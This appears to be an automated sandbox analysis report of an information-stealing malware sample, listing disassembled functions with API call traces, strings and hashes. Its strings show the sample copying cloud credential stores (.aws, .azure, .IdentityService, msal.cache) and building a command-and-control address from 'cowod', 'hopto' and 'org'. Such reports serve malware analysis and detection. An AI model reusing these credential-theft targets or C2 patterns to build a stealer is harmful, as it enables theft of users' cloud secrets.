                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                            • String ID: "$"$------$------$------$8wA$build_id$hwid
                                                                                                                            • API String ID: 3006978581-858375883
                                                                                                                            • Opcode ID: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                            • Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
                                                                                                                            • Opcode Fuzzy Hash: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                            • Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8
                                                                                                                            Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                                                                                            • wsprintfW.USER32 ref: 004016BC
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                                                                                            • _time64.MSVCRT ref: 0040170E
                                                                                                                            • srand.MSVCRT ref: 00401715
                                                                                                                            • rand.MSVCRT ref: 0040171E
                                                                                                                            • _memset.LIBCMT ref: 0040172E
                                                                                                                            • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                                                                                            • _memset.LIBCMT ref: 00401763
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00401771
                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                                                                                            • _memset.LIBCMT ref: 004017BE
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004017DB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                            • String ID: %s%s$delays.tmp
                                                                                                                            • API String ID: 1620473967-1413376734
                                                                                                                            • Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                            • Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
                                                                                                                            • Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                            • Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28
                                                                                                                            Function 004164BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004164E2
                                                                                                                              • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
                                                                                                                            • lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                              • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                              • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                              • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                              • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                              • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                            • _memset.LIBCMT ref: 00416556
                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00416578
                                                                                                                            • lstrcatA.KERNEL32(?,\.aws\), ref: 00416595
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                              • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
                                                                                                                              • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
                                                                                                                              • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                              • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                            • _memset.LIBCMT ref: 004165CA
                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 004165EC
                                                                                                                            • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
                                                                                                                            • _memset.LIBCMT ref: 0041663E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                            • API String ID: 780282842-974132213
                                                                                                                            • Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                            • Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
                                                                                                                            • Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                            • Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59
                                                                                                                            Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
                                                                                                                            • StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
                                                                                                                            • StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
                                                                                                                            • lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
                                                                                                                            • lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
                                                                                                                            • lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
                                                                                                                            • lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
                                                                                                                            • lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
                                                                                                                            • lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
                                                                                                                            • lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040AF7A
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040AF95
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040AFD8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1956182324-0
                                                                                                                            • Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                            • Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
                                                                                                                            • Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                            • Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95
                                                                                                                            Function 00417041 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                              • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                              • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
                                                                                                                            • OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4
                                                                                                                              • Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                              • Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                              • Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
                                                                                                                              • Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2
                                                                                                                              • Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                              • Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                              • Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
                                                                                                                              • Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00417A9A
                                                                                                                              • Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                              • Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                              • Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100
                                                                                                                              • Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                              • Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                              • Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                              • Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                              • Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                              • Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00418000
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                            • String ID: .exe$.exe$433cd71b7a2bdd3668a493b00ee95630$_DEBUG.zip$cowod.$hopto$http://$org
                                                                                                                            • API String ID: 305159127-3898869892
                                                                                                                            • Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                            • Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
                                                                                                                            • Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                            • Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B
                                                                                                                            Function 004135A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • strtok_s.MSVCRT ref: 004135EA
                                                                                                                            • StrCmpCA.SHLWAPI(?,true), ref: 004136AC
                                                                                                                              • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                              • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0041376E
                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 00413817
                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 00413853
                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
                                                                                                                            • strtok_s.MSVCRT ref: 0041398F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                            • String ID: false$true
                                                                                                                            • API String ID: 2116072422-2658103896
                                                                                                                            • Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                            • Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
                                                                                                                            • Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                            • Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48
                                                                                                                            Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                                            • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                                            • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                                            • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405439
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405445
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405451
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                            • String ID: GET$\xA
                                                                                                                            • API String ID: 442264750-571280152
                                                                                                                            • Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                            • Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
